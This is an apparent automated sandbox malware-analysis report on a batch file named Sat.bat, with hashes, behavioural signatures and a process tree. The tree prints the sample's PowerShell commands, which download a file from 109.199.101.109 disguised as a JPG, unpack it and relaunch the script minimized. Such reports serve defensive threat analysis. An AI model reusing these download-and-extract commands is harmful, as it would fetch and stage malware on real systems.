Analysis
-
max time kernel
122s -
max time network
129s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22-11-2024 08:04
Static task
static1
Behavioral task
behavioral1
Sample
Sat.bat
Resource
win7-20240903-en
General
-
Target
Sat.bat
-
Size
2KB
-
MD5
0e2fff554ddadc58aaff7978ec06aa32
-
SHA1
b453b17905235ea96150c90711285f7879d3afc0
-
SHA256
64c79060f8478363e93ae210e0bd7ba9178fecdd1a0badba4fed5382180d3a80
-
SHA512
c54cc4c956dc733835d0d40d49377b23b8b63bfa118e0e9ed5bba18e2b2b5f4a33656cd5b75230cd7dec05a98a3bc4b84b429121cffe3644fff72fc628b83b76
Malware Config
Extracted
http://109.199.101.109:770/xx.jpg
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 1768 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepid process 2772 powershell.exe 3008 powershell.exe 1768 powershell.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2524 timeout.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 3008 powershell.exe 3008 powershell.exe 3008 powershell.exe 1768 powershell.exe 2772 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3008 powershell.exe Token: SeDebugPrivilege 1768 powershell.exe Token: SeDebugPrivilege 2772 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
cmd.exepowershell.execmd.exedescription pid process target process PID 2860 wrote to memory of 3008 2860 cmd.exe powershell.exe PID 2860 wrote to memory of 3008 2860 cmd.exe powershell.exe PID 2860 wrote to memory of 3008 2860 cmd.exe powershell.exe PID 3008 wrote to memory of 264 3008 powershell.exe cmd.exe PID 3008 wrote to memory of 264 3008 powershell.exe cmd.exe PID 3008 wrote to memory of 264 3008 powershell.exe cmd.exe PID 264 wrote to memory of 1768 264 cmd.exe powershell.exe PID 264 wrote to memory of 1768 264 cmd.exe powershell.exe PID 264 wrote to memory of 1768 264 cmd.exe powershell.exe PID 264 wrote to memory of 2772 264 cmd.exe powershell.exe PID 264 wrote to memory of 2772 264 cmd.exe powershell.exe PID 264 wrote to memory of 2772 264 cmd.exe powershell.exe PID 264 wrote to memory of 2524 264 cmd.exe timeout.exe PID 264 wrote to memory of 2524 264 cmd.exe timeout.exe PID 264 wrote to memory of 2524 264 cmd.exe timeout.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Sat.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\Sat.bat' -ArgumentList 'minimized' -WindowStyle Minimized"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Sat.bat" minimized "3⤵
- Suspicious use of WriteProcessMemory
PID:264 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://109.199.101.109:770/xx.jpg', 'C:\Users\Admin\Documents\x.zip')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path 'C:\Users\Admin\Documents\x.zip' -DestinationPath 'C:\Users\Admin\Documents'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
C:\Windows\system32\timeout.exetimeout /t 5 /nobreak4⤵
- Delays execution with timeout.exe
PID:2524
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5300d02a1c8604dcf4cb73693170d662d
SHA1b1983fd57d9f0d4fe52665a97d81b595be746d9d
SHA25611a6f3e6846e9d4947cc89feb0747dac50137a2b7173978abe386d06fd97df32
SHA5122bb7bd1e421700e0181b595da5c83903d912ac8c40071105f4ce4c47c153685c95e2a654c6559273926f5c2992f209c277ba08a296bdab23045a2ee7b2c096b0